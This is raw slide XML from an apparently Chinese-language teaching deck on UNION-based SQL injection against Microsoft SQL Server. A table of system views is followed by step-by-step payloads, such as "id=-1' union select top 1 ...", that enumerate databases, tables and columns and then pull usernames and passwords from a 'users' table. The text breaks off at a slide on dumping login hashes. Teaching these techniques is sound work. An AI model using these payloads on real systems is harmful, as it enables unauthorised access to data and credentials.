                        <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="88872" marR="88872" marT="50784" marB="50784"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algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>SQL Server </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>中所有登录名</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="88872" marR="88872" marT="50784" marB="50784"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2"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="284448">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>information_schema.tables</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="88872" marR="88872" marT="50784" marB="50784"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algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>当前用户数据库中的表</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="88872" marR="88872" marT="50784" marB="50784"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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="284448">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>information_schema.columns</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="88872" marR="88872" marT="50784" marB="50784"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algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>当前用户数据库中的列</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="88872" marR="88872" marT="50784" marB="50784"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4"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="284448">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>sys.all_columns</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="88872" marR="88872" marT="50784" marB="50784"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algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>用户定义对象和系统对象的所有列的联合</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="88872" marR="88872" marT="50784" marB="50784"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5"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="284448">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>sys.database_principals</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="88872" marR="88872" marT="50784" marB="50784"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algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>数据库中每个权限或列异常权限</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="88872" marR="88872" marT="50784" marB="50784"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6"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="284448">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>sys.database_files</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="88872" marR="88872" marT="50784" marB="50784"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algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>存储在数据库中的数据库文件</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="88872" marR="88872" marT="50784" marB="50784"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7"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="284448">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>sysobjects</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="88872" marR="88872" marT="50784" marB="50784"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tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        </a:rPr>
                        <a:t>数据库中创建的每个对象（例如约束、日志以及存储过程）</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="88872" marR="88872" marT="50784" marB="50784" anchor="ctr">
                    <a:lnL w="9525" cap="flat" cmpd="sng" algn="ctr">
                      <a:solidFill>
                        <a:srgbClr val="C0C0C0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="9525" cap="flat" cmpd="sng" algn="ctr">
                      <a:solidFill>
                        <a:srgbClr val="C0C0C0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                    <a:lnT w="9525" cap="flat" cmpd="sng" algn="ctr">
                      <a:solidFill>
                        <a:srgbClr val="C0C0C0"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnT>
                    <a:lnB w="9525" cap="flat" cmpd="sng" algn="ctr">
                      <a:solidFill>
                        <a:srgbClr val="C0C0C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联合注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323427" y="1185334"/>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联合注入的过程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709775" y="1885315"/>
            <a:ext cx="12055731" cy="414221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marL="172796">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>、获取当前数据库版本</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRP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rPr>
              <a:t>id=-1' union select top 1 1,2,@@version</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="172796">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="172796">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>、获取当前数据库名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRP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rPr>
              <a:t>id=-1' union select top 1 1,2,db_name()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="479988" indent="-307192">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="172796">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>、获取所有数据库名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRP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rPr>
              <a:t>id=-1' union select top 1 1,2,name from master.sys.databases where name not in(select top 1 name from master.sys.databases)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="172796">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="172796">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="16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5689970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联合注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323427" y="1185334"/>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联合注入的过程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709775" y="1885315"/>
            <a:ext cx="10883511" cy="451155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marL="172796">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>、获取表名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRP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rPr>
              <a:t>id=-1' union select top 1 1,2,table_name from information_schema.tables where table_name not in(select top 1 table_name from information_schema.tables)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="172796">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="172796">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>、获取列名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRP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rPr>
              <a:t>id=-1' union select top 1 1,2,</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column_name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>from information_schema.columns where table_name='users' and column_name not in(select top 1 column_name from information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>where table_name='users')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="479988" indent="-307192">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="172796">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>、获取数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRP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rPr>
              <a:t>id=-1' union select top 1 1,username,password from users where username not in(select top 1 username from users) and password not in(select top 1 password from users)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2489107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DD2E6D-2A2A-4437-AD96-86366062AD89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="921572" y="2382235"/>
            <a:ext cx="10577028" cy="4305531"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91419" tIns="45710" rIns="91419" bIns="45710"/>
          <a:lstStyle>
            <a:lvl1pPr eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
                <a:cs typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
                <a:cs typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
                <a:cs typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
                <a:cs typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
                <a:cs typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="25146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6pPr>
            <a:lvl7pPr marL="29718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7pPr>
            <a:lvl8pPr marL="34290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8pPr>
            <a:lvl9pPr marL="38862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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>注入查询登录用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
